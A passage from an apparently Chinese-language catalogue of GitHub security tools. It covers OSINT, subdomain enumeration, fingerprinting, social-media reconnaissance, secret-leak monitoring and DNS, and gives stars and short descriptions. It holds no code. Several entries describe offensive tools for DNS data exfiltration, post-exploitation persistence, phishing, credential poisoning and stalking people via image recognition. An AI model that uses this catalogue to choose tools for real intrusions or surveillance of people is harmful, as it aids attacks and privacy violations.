[hell0w0rld0/github-hunter](https://github.com/hell0w0rld0/github-hunter) This tool is for sensitive information searching on Github - The Fast Version here:\n- [**324**星][4d] [HTML] [tanjiti/sec_profile](https://github.com/tanjiti/sec_profile) 爬取secwiki和xuanwu.github.io/sec.today,分析安全信息站点、安全趋势、提取安全工作者账号(twitter,weixin,github等)\n - 重复区段: [侦察->工具->社交网络->Github](#8d1ae776898748b8249132e822f6c919) |\n\n\n### 隐私存储\n\n\n#### 未分类\n\n\n- [**5082**星][3m] [Shell] [stackexchange/blackbox](https://github.com/stackexchange/blackbox) 文件使用PGP加密后隐藏在Git/Mercurial/Subversion\n\n\n#### 隐写\n\n\n- [**583**星][2m] [Go] [dimitarpetrov/stegify](https://github.com/dimitarpetrov/stegify) Go tool for LSB steganography, capable of hiding any file within an image.\n- [**358**星][7m] [Go] [lukechampine/jsteg](https://github.com/lukechampine/jsteg) JPEG steganography\n- [**354**星][6m] [Java] [syvaidya/openstego](https://github.com/syvaidya/openstego) OpenStego is a steganography application that provides two functionalities: a) Data Hiding: It can hide any data within a cover file (e.g. images). b) Watermarking: Watermarking files (e.g. images) with an invisible signature. It can be used to detect unauthorized file copying.\n- [**280**星][1y] [C] [abeluck/stegdetect](https://github.com/abeluck/stegdetect) UNMAINTAINED. USE AT OWN RISK. Stegdetect is an automated tool for detecting steganographic content in images.\n- [**258**星][] [Py] [cedricbonhomme/stegano](https://github.com/cedricbonhomme/stegano) Stegano is a pure Python steganography module.\n\n\n\n\n\n\n***\n\n\n## 文章\n\n\n### 新添加的\n\n\n\n\n\n\n# 侦察&&信息收集&&子域名发现与枚举&&OSINT\n\n\n***\n\n\n## 工具\n\n\n### 未分类-OSINT\n\n\n- [**7307**星][12d] [Java] [lionsoul2014/ip2region](https://github.com/lionsoul2014/ip2region) Ip2region is a offline IP location library with accuracy rate of 99.9% and 0.0x millseconds searching performance. DB file is less then 5Mb with all ip address stored. binding for Java,PHP,C,Python,Nodejs,Golang,C#,lua. Binary,B-tree,Memory searching algorithm\n- [**6964**星][22d] [greatfire/wiki](https://github.com/greatfire/wiki) 自由浏览\n- [**6140**星][10m] [Py] [schollz/howmanypeoplearearound](https://github.com/schollz/howmanypeoplearearound) 检测 Wifi 信号统计你周围的人数\n - 重复区段: [无线->未分类-WiFi](#d4efda1853b2cb0909727188116a2a8c) |\n- [**2224**星][1m] [C] [texane/stlink](https://github.com/texane/stlink) stm32 discovery line linux programmer\n- [**2134**星][t] [Py] [fortynorthsecurity/eyewitness](https://github.com/FortyNorthSecurity/EyeWitness) 给网站做快照,提供服务器Header信息,识别默认凭证等\n- [**1792**星][t] [Shell] [leebaird/discover](https://github.com/leebaird/discover) 自定义的bash脚本, 用于自动化多个渗透测试任务, 包括: 侦查、扫描、解析、在Metasploit中创建恶意Payload和Listener\n - 重复区段: [渗透->工具->自动化](#fc8737aef0f59c3952d11749fe582dac) |[渗透->工具->Metasploit->未分类-metasploit](#01be61d5bb9f6f7199208ff0fba86b5d) |[Payload->工具->Payload生成](#ad92f6b801a18934f1971e2512f5ae4f) |\n- [**1666**星][] [Py] [cea-sec/ivre](https://github.com/cea-sec/ivre) Network recon framework.\n- [**1642**星][25d] [Go] [awnumar/memguard](https://github.com/awnumar/memguard) 处理内存中敏感的值,纯Go语言编写。\n- [**1609**星][5m] [Py] [mozilla/cipherscan](https://github.com/mozilla/cipherscan) 查找指定目标支持的SSL ciphersuites\n- [**1484**星][13d] [Py] [enablesecurity/wafw00f](https://github.com/enablesecurity/wafw00f) 识别保护网站的WAF产品\n- [**1401**星][13d] [JS] [lockfale/osint-framework](https://github.com/lockfale/osint-framework) OSINT Framework\n- [**1363**星][2m] [CSS] [undeadsec/socialfish](https://github.com/undeadsec/socialfish) 网络钓鱼培训与信息收集\n - 重复区段: [社工(SET)->工具->未分类-SET](#ce734598055ad3885d45d0b35d2bf0d7) |\n- [**1354**星][8d] [Py] [s0md3v/arjun](https://github.com/s0md3v/Arjun) HTTP parameter discovery suite.\n- [**1289**星][3m] [Py] [codingo/reconnoitre](https://github.com/codingo/reconnoitre) A security tool for multithreaded information gathering and service enumeration whilst building directory structures to store results, along with writing out recommendations for further testing.\n- [**1279**星][1y] [PS] [dafthack/mailsniper](https://github.com/dafthack/mailsniper) 在Microsoft Exchange环境中搜索邮件中包含的指定内容:密码、insider intel、网络架构信息等\n- [**1224**星][1m] [Py] [codingo/nosqlmap](https://github.com/codingo/NoSQLMap) Automated NoSQL database enumeration and web application exploitation tool.\n- [**1199**星][11m] [C] [blechschmidt/massdns](https://github.com/blechschmidt/massdns) A high-performance DNS stub resolver for bulk lookups and reconnaissance (subdomain enumeration)\n- [**1108**星][t] [Py] [sundowndev/phoneinfoga](https://github.com/sundowndev/phoneinfoga) Advanced information gathering & OSINT tool for phone numbers\n- [**1102**星][3m] [PHP] [tuhinshubhra/red_hawk](https://github.com/tuhinshubhra/red_hawk) 信息收集、漏洞扫描、爬虫多合一\n - 重复区段: [扫描器->工具->未分类-Scanner](#de63a029bda6a7e429af272f291bb769) |\n- [**1059**星][16d] [Rust] [fgribreau/mailchecker](https://github.com/fgribreau/mailchecker) 邮件检测库,跨语言。覆盖33078虚假邮件提供者\n- [**976**星][5m] [C] [rbsec/sslscan](https://github.com/rbsec/sslscan) 测试启用SSL/TLS的服务,发现其支持的cipher suites\n- [**931**星][16d] [OCaml] [airbus-seclab/bincat](https://github.com/airbus-seclab/bincat) 二进制代码静态分析工具。值分析(寄存器、内存)、污点分析、类型重建和传播(propagation)、前向/后向分析\n- [**906**星][5m] [derpopo/uabe](https://github.com/derpopo/uabe) Unity Assets Bundle Extractor\n- [**866**星][8m] [Py] [s0md3v/recondog](https://github.com/s0md3v/ReconDog) Reconnaissance Swiss Army Knife\n- [**778**星][5m] [Shell] [nahamsec/lazyrecon](https://github.com/nahamsec/lazyrecon) 侦查(reconnaissance)过程自动化脚本, 可自动使用Sublist3r/certspotter获取子域名, 调用nmap/dirsearch等\n- [**778**星][1y] [HTML] [sense-of-security/adrecon](https://github.com/sense-of-security/adrecon) 收集Active Directory信息并生成报告\n- [**758**星][2m] [Py] [khast3x/h8mail](https://github.com/khast3x/h8mail) Password Breach Hunting and Email OSINT tool, locally or using premium services. Supports chasing down related email\n- [**754**星][4m] [Py] [threatexpress/domainhunter](https://github.com/threatexpress/domainhunter) Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names\n - 重复区段: [社工(SET)->工具->未分类-SET](#ce734598055ad3885d45d0b35d2bf0d7) |\n- [**706**星][21d] [Ruby] [intrigueio/intrigue-core](https://github.com/intrigueio/intrigue-core) 外部攻击面发现框架,自动化OSINT\n- [**625**星][5m] [Py] [deibit/cansina](https://github.com/deibit/cansina) web 内容发现工具。发出各种请求并过滤回复,识别是否存在请求的资源。\n- [**595**星][2m] [Py] [1n3/blackwidow](https://github.com/1n3/blackwidow) A Python based web application scanner to gather OSINT and fuzz for OWASP vulnerabilities on a target website.\n- [**582**星][8m] [Py] [ekultek/zeus-scanner](https://github.com/ekultek/zeus-scanner) Advanced reconnaissance utility\n- [**561**星][1m] [Py] [m4ll0k/infoga](https://github.com/m4ll0k/infoga) 邮件信息收集工具\n- [**516**星][1m] [no-github/digital-privacy](https://github.com/no-github/digital-privacy) 一个关于数字隐私搜集、保护、清理集一体的方案,外加开源信息收集(OSINT)对抗\n- [**492**星][29d] [Rust] [kpcyrd/sn0int](https://github.com/kpcyrd/sn0int) Semi-automatic OSINT framework and package manager\n- [**475**星][4m] [Py] [xillwillx/skiptracer](https://github.com/xillwillx/skiptracer) OSINT python webscaping framework\n- [**442**星][3m] [Py] [superhedgy/attacksurfacemapper](https://github.com/superhedgy/attacksurfacemapper) AttackSurfaceMapper is a tool that aims to automate the reconnaissance process.\n- [**422**星][1y] [JS] [ciscocsirt/gosint](https://github.com/ciscocsirt/gosint) 收集、处理、索引高质量IOC的框架\n- [**411**星][5m] [Shell] [d4rk007/redghost](https://github.com/d4rk007/redghost) Linux post exploitation framework written in bash designed to assist red teams in persistence, reconnaissance, privilege escalation and leaving no trace.\n- [**409**星][3m] [ph055a/osint-collection](https://github.com/ph055a/osint-collection) Maintained collection of OSINT related resources. (All Free & Actionable)\n- [**397**星][5d] [Go] [graniet/operative-framework](https://github.com/graniet/operative-framework) operative framework is a OSINT investigation framework, you can interact with multiple targets, execute multiple modules, create links with target, export rapport to PDF file, add note to target or results, interact with RESTFul API, write your own modules.\n- [**392**星][1y] [Py] [chrismaddalena/odin](https://github.com/chrismaddalena/odin) Automated network asset, email, and social media profile discovery and cataloguing.\n- [**383**星][2m] [Py] [dedsecinside/torbot](https://github.com/dedsecinside/torbot) Dark Web OSINT Tool\n- [**354**星][12m] [Py] [aancw/belati](https://github.com/aancw/belati) The Traditional Swiss Army Knife for OSINT\n- [**353**星][18d] [Py] [depthsecurity/armory](https://github.com/depthsecurity/armory) Armory is a tool meant to take in a lot of external and discovery data from a lot of tools, add it to a database and correlate all of related information.\n- [**344**星][16d] [Py] [darryllane/bluto](https://github.com/darryllane/bluto) DNS Recon | Brute Forcer | DNS Zone Transfer | DNS Wild Card Checks | DNS Wild Card Brute Forcer | Email Enumeration | Staff Enumeration | Compromised Account Checking\n- [**336**星][12m] [Py] [mdsecactivebreach/linkedint](https://github.com/mdsecactivebreach/linkedint) A LinkedIn scraper for reconnaissance during adversary simulation\n- [**329**星][6m] [Go] [nhoya/gosint](https://github.com/nhoya/gosint) OSINT Swiss Army Knife\n- [**328**星][17d] [Py] [initstring/linkedin2username](https://github.com/initstring/linkedin2username) Generate username lists for companies on LinkedIn\n- [**314**星][] [Py] [sharadkumar97/osint-spy](https://github.com/sharadkumar97/osint-spy) Performs OSINT scan on email/domain/ip_address/organization using OSINT-SPY. It can be used by Data Miners, Infosec Researchers, Penetration Testers and cyber crime investigator in order to find deep information about their target. If you want to ask something please feel free to reach out to me at robotcoder@protonmail.com\n- [**313**星][1y] [Py] [twelvesec/gasmask](https://github.com/twelvesec/gasmask) Information gathering tool - OSINT\n- [**307**星][1y] [Py] [r3vn/badkarma](https://github.com/r3vn/badkarma) network reconnaissance toolkit\n- [**297**星][7m] [Shell] [eschultze/urlextractor](https://github.com/eschultze/urlextractor) Information gathering & website reconnaissance |\n- [**292**星][3m] [JS] [pownjs/pown-recon](https://github.com/pownjs/pown-recon) A powerful target reconnaissance framework powered by graph theory.\n- [**286**星][1y] [Shell] [ha71/namechk](https://github.com/ha71/namechk) Osint tool based on namechk.com for checking usernames on more than 100 websites, forums and social networks.\n- [**285**星][23d] [Py] [ekultek/whatbreach](https://github.com/ekultek/whatbreach) OSINT tool to find breached emails, databases, pastes, and relevant information\n- [**269**星][1y] [Go] [tomsteele/blacksheepwall](https://github.com/tomsteele/blacksheepwall) blacksheepwall is a hostname reconnaissance tool\n- [**259**星][4m] [Py] [thewhiteh4t/finalrecon](https://github.com/thewhiteh4t/finalrecon) OSINT Tool for All-In-One Web Reconnaissance\n- [**258**星][3m] [Shell] [solomonsklash/chomp-scan](https://github.com/solomonsklash/chomp-scan) A scripted pipeline of tools to streamline the bug bounty/penetration test reconnaissance phase, so you can focus on chomping bugs.\n- [**257**星][8d] [TS] [ninoseki/mitaka](https://github.com/ninoseki/mitaka) A browser extension for OSINT search\n- [**253**星][26d] [Py] [zephrfish/googd0rker](https://github.com/zephrfish/googd0rker) GoogD0rker is a tool for firing off google dorks against a target domain, it is purely for OSINT against a specific target domain. READ the readme before messaging or tweeting me.\n- [**243**星][2m] [Py] [sc1341/instagramosint](https://github.com/sc1341/instagramosint) An Instagram Open Source Intelligence Tool\n- [**236**星][7m] [JS] [cliqz-oss/local-sheriff](https://github.com/cliqz-oss/local-sheriff) Think of Local sheriff as a recon tool in your browser (WebExtension). While you normally browse the internet, Local Sheriff works in the background to empower you in identifying what data points (PII) are being shared / leaked to which all third-parties.\n- [**233**星][2m] [Propeller Spin] [grandideastudio/jtagulator](https://github.com/grandideastudio/jtagulator) Assisted discovery of on-chip debug interfaces\n- [**229**星][2m] [Py] [anon-exploiter/sitebroker](https://github.com/anon-exploiter/sitebroker) A cross-platform python based utility for information gathering and penetration testing automation!\n- [**226**星][5d] [Py] [eth0izzle/the-endorser](https://github.com/eth0izzle/the-endorser) An OSINT tool that allows you to draw out relationships between people on LinkedIn via endorsements/skills.\n- [**223**星][1y] [Shell] [edoverflow/megplus](https://github.com/edoverflow/megplus) Automated reconnaissance wrapper — TomNomNom's meg on steroids. [DEPRECATED]\n- [**222**星][1m] [PS] [tonyphipps/meerkat](https://github.com/tonyphipps/meerkat) A collection of PowerShell modules designed for artifact gathering and reconnaisance of Windows-based endpoints.\n- [**220**星][9d] [Shell] [x1mdev/reconpi](https://github.com/x1mdev/reconpi) ReconPi - A lightweight recon tool that performs extensive scanning with the latest tools.\n- [**217**星][5m] [Py] [spiderlabs/hosthunter](https://github.com/spiderlabs/hosthunter) HostHunter a recon tool for discovering hostnames using OSINT techniques.\n- [**211**星][2m] [Py] [inquest/omnibus](https://github.com/inquest/omnibus) The OSINT Omnibus (beta release)\n- [**201**星][4m] [Py] [sham00n/buster](https://github.com/sham00n/buster) An advanced tool for email reconnaissance\n\n\n### 子域名枚举&&爆破\n\n\n- [**4153**星][2m] [Py] [aboul3la/sublist3r](https://github.com/aboul3la/sublist3r) Fast subdomains enumeration tool for penetration testers\n- [**3270**星][27d] [Py] [laramies/theharvester](https://github.com/laramies/theharvester) E-mails, subdomains and names Harvester - OSINT\n- [**3102**星][7m] [Go] [michenriksen/aquatone](https://github.com/michenriksen/aquatone) 子域名枚举工具。除了经典的爆破枚举之外,还利用多种开源工具和在线服务大幅度增加发现子域名的数量。\n- [**2028**星][8d] [Go] [projectdiscovery/subfinder](https://github.com/projectdiscovery/subfinder) 使用Passive Sources, Search Engines, Pastebins, Internet Archives等查找子域名\n- [**1808**星][7m] [Py] [lijiejie/subdomainsbrute](https://github.com/lijiejie/subdomainsbrute) 子域名爆破\n- [**1716**星][8m] [Py] [guelfoweb/knock](https://github.com/guelfoweb/knock) 使用 Wordlist 枚举子域名\n- [**1561**星][11d] [Go] [caffix/amass](https://github.com/caffix/amass) 子域名枚举, 搜索互联网数据源, 使用机器学习猜测子域名. Go语言\n- [**1115**星][2m] [Py] [john-kurkowski/tldextract](https://github.com/john-kurkowski/tldextract) Accurately separate the TLD from the registered domain and subdomains of a URL, using the Public Suffix List.\n- [**990**星][6d] [Py] [shmilylty/oneforall](https://github.com/shmilylty/oneforall) 子域收集工具\n- [**823**星][8d] [Rust] [edu4rdshl/findomain](https://github.com/edu4rdshl/findomain) The fastest and cross-platform subdomain enumerator, don't waste your time.\n- [**773**星][5m] [Go] [haccer/subjack](https://github.com/haccer/subjack) 异步多线程扫描子域列表,识别能够被劫持的子域。Go 编写\n- [**649**星][1y] [Py] [simplysecurity/simplyemail](https://github.com/SimplySecurity/SimplyEmail) Email recon made fast and easy, with a framework to build on\n- [**575**星][3m] [Py] [jonluca/anubis](https://github.com/jonluca/anubis) Subdomain enumeration and information gathering tool\n- [**553**星][9m] [Py] [feeicn/esd](https://github.com/feeicn/esd) Enumeration sub domains(枚举子域名)\n- [**499**星][3m] [Py] [yanxiu0614/subdomain3](https://github.com/yanxiu0614/subdomain3) 简单快速的子域名爆破工具。\n- [**498**星][27d] [Py] [typeerror/domained](https://github.com/TypeError/domained) Multi Tool Subdomain Enumeration\n- [**479**星][6m] [Py] [threezh1/jsfinder](https://github.com/threezh1/jsfinder) JSFinder is a tool for quickly extracting URLs and subdomains from JS files on a website.\n- [**454**星][25d] [Py] [nsonaniya2010/subdomainizer](https://github.com/nsonaniya2010/subdomainizer) A tool to find subdomains and interesting things hidden inside, external Javascript files of page, folder, and Github.\n- [**445**星][1y] [Go] [ice3man543/subover](https://github.com/ice3man543/subover) A Powerful Subdomain Takeover Tool\n- [**432**星][11m] [Py] [appsecco/bugcrowd-levelup-subdomain-enumeration](https://github.com/appsecco/bugcrowd-levelup-subdomain-enumeration) This repository contains all the material from the talk \"Esoteric sub-domain enumeration techniques\" given at Bugcrowd LevelUp 2017 virtual conference\n- [**334**星][5m] [Py] [chris408/ct-exposer](https://github.com/chris408/ct-exposer) An OSINT tool that discovers sub-domains by searching Certificate Transparency logs\n- [**332**星][2m] [Go] [tomnomnom/assetfinder](https://github.com/tomnomnom/assetfinder) Find domains and subdomains related to a given domain\n- [**293**星][4d] [Go] [anshumanbh/tko-subs](https://github.com/anshumanbh/tko-subs) A tool that can help detect and takeover subdomains with dead DNS records\n- [**279**星][26d] [Py] [franccesco/getaltname](https://github.com/franccesco/getaltname) 直接从SSL证书中提取子域名或虚拟域名\n- [**277**星][11m] [Py] [appsecco/the-art-of-subdomain-enumeration](https://github.com/appsecco/the-art-of-subdomain-enumeration) This repository contains all the supplement material for the book \"The art of sub-domain enumeration\"\n- [**228**星][2m] [Shell] [screetsec/sudomy](https://github.com/screetsec/sudomy) Sudomy is a subdomain enumeration tool, created using a bash script, to analyze domains and collect subdomains in fast and comprehensive way . Report output in HTML or CSV format\n\n\n### 信息收集&&侦查&&Recon&&InfoGather\n\n\n- [**3603**星][11d] [Shell] [drwetter/testssl.sh](https://github.com/drwetter/testssl.sh) 检查服务器任意端口对 TLS/SSL 的支持、协议以及一些加密缺陷,命令行工具\n- [**2489**星][1m] [Py] [smicallef/spiderfoot](https://github.com/smicallef/spiderfoot) 自动收集指定目标的信息:IP、域名、主机名、网络子网、ASN、邮件地址、用户名\n- [**2021**星][7d] [Py] [j3ssie/osmedeus](https://github.com/j3ssie/osmedeus) Fully automated offensive security framework for reconnaissance and vulnerability scanning\n- [**1966**星][9m] [JS] [weichiachang/stacks-cli](https://github.com/weichiachang/stacks-cli) Check website stack from the terminal\n- [**1958**星][30d] [Go] [mpolden/echoip](https://github.com/mpolden/echoip) IP address lookup service\n- [**1651**星][1y] [Py] [evyatarmeged/raccoon](https://github.com/evyatarmeged/raccoon) 高性能的侦查和漏洞扫描工具\n- [**1486**星][6m] [Py] [oros42/imsi-catcher](https://github.com/oros42/imsi-catcher) This program show you IMSI numbers of cellphones around you.\n- [**1305**星][1y] [Go] [evilsocket/xray](https://github.com/evilsocket/xray) 自动化执行一些信息收集、网络映射的初始化工作\n- [**1154**星][23d] [C] [xroche/httrack](https://github.com/xroche/httrack) download a World Wide website from the Internet to a local directory, building recursively all directories, getting html, images, and other files from the server to your computer.\n- [**975**星][2m] [HTML] [n0tr00t/sreg](https://github.com/n0tr00t/sreg) 可对使用者通过输入email、phone、username的返回用户注册的所有互联网护照信息。\n- [**923**星][3m] [Ruby] [weppos/whois](https://github.com/weppos/whois) An intelligent — pure Ruby — WHOIS client and parser.\n- [**860**星][11m] [Shell] [thelinuxchoice/userrecon](https://github.com/thelinuxchoice/userrecon) Find usernames across over 75 social networks\n- [**838**星][7d] [HTML] [rewardone/oscprepo](https://github.com/rewardone/oscprepo) A list of commands, scripts, resources, and more that I have gathered and attempted to consolidate for use as OSCP (and more) study material. Commands in 'Usefulcommands' Keepnote. Bookmarks and reading material in 'BookmarkList' Keepnote. Reconscan in scripts folder.\n- [**677**星][2m] [Py] [tib3rius/autorecon](https://github.com/tib3rius/autorecon) AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.\n- [**512**星][10m] [Py] [fortynorthsecurity/just-metadata](https://github.com/FortyNorthSecurity/Just-Metadata) Just-Metadata is a tool that gathers and analyzes metadata about IP addresses. It attempts to find relationships between systems within a large dataset.\n- [**483**星][2m] [Py] [yassineaboukir/sublert](https://github.com/yassineaboukir/sublert) Sublert is a security and reconnaissance tool which leverages certificate transparency to automatically monitor new subdomains deployed by specific organizations and issued TLS/SSL certificate.\n- [**418**星][2m] [Py] [lanmaster53/recon-ng](https://github.com/lanmaster53/recon-ng) Open Source Intelligence gathering tool aimed at reducing the time spent harvesting information from open sources.\n- [**394**星][11m] [Swift] [ibm/mac-ibm-enrollment-app](https://github.com/ibm/mac-ibm-enrollment-app) The Mac@IBM enrollment app makes setting up macOS with Jamf Pro more intuitive for users and easier for IT. The application offers IT admins the ability to gather additional information about their users during setup, allows users to customize their enrollment by selecting apps or bundles of apps to install during setup, and provides users with …\n- [**362**星][2m] [Shell] [vitalysim/totalrecon](https://github.com/vitalysim/totalrecon) TotalRecon installs all the recon tools you need\n- [**361**星][5m] [C++] [wbenny/pdbex](https://github.com/wbenny/pdbex) pdbex is a utility for reconstructing structures and unions from the PDB into compilable C headers\n- [**307**星][5m] [PLpgSQL] [amachanic/sp_whoisactive](https://github.com/amachanic/sp_whoisactive) sp_whoisactive\n- [**300**星][18d] [Py] [govanguard/legion](https://github.com/govanguard/legion) Legion is an open source, easy-to-use, super-extensible and semi-automated network penetration testing tool that aids in discovery, reconnaissance and exploitation of information systems.\n- [**273**星][20d] [Rust] [nccgroup/dirble](https://github.com/nccgroup/dirble) Fast directory scanning and scraping tool\n- [**269**星][11m] [Py] [LaNMaSteR53/recon-ng](https://bitbucket.org/lanmaster53/recon-ng) \n- [**258**星][4d] [Java] [ripe-ncc/whois](https://github.com/ripe-ncc/whois) RIPE Database whois code repository\n- [**233**星][2m] [C] [elfmaster/libelfmaster](https://github.com/elfmaster/libelfmaster) Secure ELF parsing/loading library for forensics reconstruction of malware, and robust reverse engineering tools\n- [**200**星][2m] [Py] [tylous/vibe](https://github.com/tylous/vibe) A framework for stealthy domain reconnaissance\n\n\n### 指纹&&Fingerprinting\n\n\n- [**9519**星][12d] [JS] [valve/fingerprintjs2](https://github.com/valve/fingerprintjs2) Modern & flexible browser fingerprinting library\n- [**4758**星][7m] [Py] [worldveil/dejavu](https://github.com/worldveil/dejavu) Audio fingerprinting and recognition in Python\n- [**3072**星][2m] [JS] [valve/fingerprintjs](https://github.com/valve/fingerprintjs) Anonymous browser fingerprint\n- [**1670**星][] [JS] [ghacksuserjs/ghacks-user.js](https://github.com/ghacksuserjs/ghacks-user.js) An ongoing comprehensive user.js template for configuring and hardening Firefox privacy, security and anti-fingerprinting\n- [**1618**星][10m] [C] [nmikhailov/validity90](https://github.com/nmikhailov/validity90) Reverse engineering of Validity/Synaptics 138a:0090, 138a:0094, 138a:0097, 06cb:0081, 06cb:009a fingerprint readers protocol\n- [**931**星][8m] [JS] [song-li/cross_browser](https://github.com/song-li/cross_browser) cross_browser_fingerprinting\n- [**831**星][1m] [Py] [salesforce/ja3](https://github.com/salesforce/ja3) SSL/TLS 客户端指纹,用于恶意代码检测\n- [**380**星][2m] [Py] [0x4d31/fatt](https://github.com/0x4d31/fatt) FATT /fingerprintAllTheThings - a pyshark based script for extracting network metadata and fingerprints from pcap files and live network traffic\n- [**313**星][3m] [Py] [dpwe/audfprint](https://github.com/dpwe/audfprint) Landmark-based audio fingerprinting\n- [**312**星][4m] [Py] [salesforce/hassh](https://github.com/salesforce/hassh) HASSH is a network fingerprinting standard which can be used to identify specific Client and Server SSH implementations. The fingerprints can be easily stored, searched and shared in the form of a small MD5 fingerprint.\n- [**282**星][1y] [CSS] [w-digital-scanner/w11scan](https://github.com/w-digital-scanner/w11scan) 分布式WEB指纹识别平台 Distributed WEB fingerprint identification platform\n- [**245**星][3m] [C] [leebrotherston/tls-fingerprinting](https://github.com/leebrotherston/tls-fingerprinting) TLS Fingerprinting\n- [**223**星][25d] [GLSL] [westpointltd/tls_prober](https://github.com/westpointltd/tls_prober) A tool to fingerprint SSL/TLS servers\n- [**220**星][1y] [Py] [sensepost/spartan](https://github.com/sensepost/spartan) Frontpage and Sharepoint fingerprinting and attack tool.\n\n\n### 收集\n\n\n- [**3868**星][1m] [jivoi/awesome-osint](https://github.com/jivoi/awesome-osint) OSINT资源收集\n\n\n### 社交网络\n\n\n#### 其他-SocialNetwork\n\n\n- [**9767**星][4d] [Py] [sherlock-project/sherlock](https://github.com/sherlock-project/sherlock) Find Usernames Across Social Networks\n- [**2578**星][3m] [Py] [greenwolf/social_mapper](https://github.com/Greenwolf/social_mapper) 对多个社交网站的用户Profile图片进行大规模的人脸识别\n- [**1131**星][3m] [Py] [thoughtfuldev/eagleeye](https://github.com/thoughtfuldev/eagleeye) Stalk your Friends. Find their Instagram, FB and Twitter Profiles using Image Recognition and Reverse Image Search.\n- [**664**星][1y] [Go] [0x09al/raven](https://github.com/0x09al/raven) raven is a Linkedin information gathering tool that can be used by pentesters to gather information about an organization employees using Linkedin.\n\n\n#### Twitter\n\n\n- [**3033**星][4d] [Py] [twintproject/twint](https://github.com/twintproject/twint) An advanced Twitter scraping & OSINT tool written in Python that doesn't use Twitter's API, allowing you to scrape a user's followers, following, Tweets and more while evading most API limitations.\n\n\n#### Github\n\n\n- [**1717**星][2m] [Go] [eth0izzle/shhgit](https://github.com/eth0izzle/shhgit) 监听Github Event API,实时查找Github代码和Gist中的secret和敏感文件\n- [**1636**星][2m] [Shell] [internetwache/gittools](https://github.com/internetwache/gittools) find websites with their .git repository available to the public\n- [**1563**星][1y] [Py] [unkl4b/gitminer](https://github.com/unkl4b/gitminer) Github内容挖掘\n- [**1352**星][7m] [Py] [feeicn/gsil](https://github.com/feeicn/gsil) GitHub敏感信息泄露监控,几乎实时监控,发送警告\n- [**859**星][2m] [JS] [vksrc/github-monitor](https://github.com/vksrc/github-monitor) Github Sensitive Information Leakage Monitor(Github信息泄漏监控系统)\n- [**857**星][7m] [Go] [misecurity/x-patrol](https://github.com/misecurity/x-patrol) github泄露扫描系统\n- [**810**星][4m] [Py] [techgaun/github-dorks](https://github.com/techgaun/github-dorks) 快速搜索Github repo中的敏感信息\n- [**789**星][2m] [Py] [bishopfox/gitgot](https://github.com/bishopfox/gitgot) Semi-automated, feedback-driven tool to rapidly search through troves of public data on GitHub for sensitive secrets.\n- [**667**星][3m] [Py] [hisxo/gitgraber](https://github.com/hisxo/gitgraber) monitor GitHub to search and find sensitive data in real time for different online services such as: Google, Amazon, Paypal, Github, Mailgun, Facebook, Twitter, Heroku, Stripe...\n- [**324**星][4d] [HTML] [tanjiti/sec_profile](https://github.com/tanjiti/sec_profile) 爬取secwiki和xuanwu.github.io/sec.today,分析安全信息站点、安全趋势、提取安全工作者账号(twitter,weixin,github等)\n - 重复区段: [扫描器->工具->隐私](#58d8b993ffc34f7ded7f4a0077129eb2) |\n- [**294**星][8m] [Py] [s0md3v/zen](https://github.com/s0md3v/zen) 查找Github用户的邮箱地址\n\n\n\n\n### DNS\n\n\n- [**2562**星][5m] [Go] [oj/gobuster](https://github.com/oj/gobuster) Directory/File, DNS and VHost busting tool written in Go\n- [**2380**星][2m] [Py] [ab77/netflix-proxy](https://github.com/ab77/netflix-proxy) Smart DNS proxy to watch Netflix\n- [**2131**星][2m] [Py] [elceef/dnstwist](https://github.com/elceef/dnstwist) 域名置换引擎,用于检测打字错误,网络钓鱼和企业间谍活动\n - 重复区段: [社工(SET)->工具->钓鱼](#290e9ae48108d21d6d8b9ea9e74d077d) |\n- [**1933**星][7d] [C++] [powerdns/pdns](https://github.com/powerdns/pdns) PowerDNS\n- [**1735**星][4m] [Py] [lgandx/responder](https://github.com/lgandx/responder) Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.\n- [**1144**星][16d] [Py] [darkoperator/dnsrecon](https://github.com/darkoperator/dnsrecon) DNS 枚举脚本\n- [**1090**星][1m] [Go] [looterz/grimd](https://github.com/looterz/grimd) Fast dns proxy that can run anywhere, built to black-hole internet advertisements and malware servers.\n- [**1090**星][2m] [Go] [nadoo/glider](https://github.com/nadoo/glider) 正向代理,支持若干协议\n- [**1078**星][3m] [Py] [infosec-au/altdns](https://github.com/infosec-au/altdns) Generates permutations, alterations and mutations of subdomains and then resolves them\n- [**977**星][7m] [Py] [m57/dnsteal](https://github.com/m57/dnsteal) DNS Exfiltration tool for stealthily sending files over DNS requests.\n- [**912**星][5m] [Py] [m0rtem/cloudfail](https://github.com/m0rtem/cloudfail) 通过错误配置的DNS和老数据库,发现CloudFlare网络后面的隐藏IP\n- [**908**星][30d] [Py] [mschwager/fierce](https://github.com/mschwager/fierce) A DNS reconnaissance tool for locating non-contiguous IP space.\n- [**708**星][1y] [Py] [bugscanteam/dnslog](https://github.com/bugscanteam/dnslog) 监控 DNS 解析记录和 HTTP 访问记录\n- [**613**星][8m] [Shell] [cokebar/gfwlist2dnsmasq](https://github.com/cokebar/gfwlist2dnsmasq) A shell script which convert gfwlist into dnsmasq rules. Python version:\n- [**585**星][2m] [C] [getdnsapi/stubby](https://github.com/getdnsapi/stubby) Stubby is the name given to a mode of using getdns which enables it to act as a local DNS Privacy stub resolver (using DNS-over-TLS).\n- [**461**星][9m] [C] [cofyc/dnscrypt-wrapper](https://github.com/cofyc/dnscrypt-wrapper) This is dnscrypt wrapper (server-side dnscrypt proxy), which helps to add dnscrypt support to any name resolver.\n- [**415**星][6m] [Py] [dnsviz/dnsviz](https://github.com/dnsviz/dnsviz) s a tool suite for analysis and visualization of Domain Name System (DNS) behavior, including its security extensions (DNSSEC)\n- [**375**星][1m] [JS] [nccgroup/singularity](https://github.com/nccgroup/singularity) A DNS rebinding attack framework.\n- [**355**星][1y] [Py] [i3visio/osrframework](https://github.com/i3visio/osrframework) 开源研究框架,提供 API 和工具执行更加精确的在线研究,例如用户名检查、DNS lookup、信息泄露研究、深度 web 研究、正则表达式提取等。\n- [**336**星][5m] [Py] [rbsec/dnscan](https://github.com/rbsec/dnscan) a python wordlist-based DNS subdomain scanner.\n- [**267**星][1y] [Py] [trycatchhcf/packetwhisper](https://github.com/trycatchhcf/packetwhisper) Stealthily exfiltrate data and defeat attribution using DNS queries and text-based steganography. Avoid the problems associated with typical DNS exfiltration methods. Transfer data between systems without the communicating devices directly 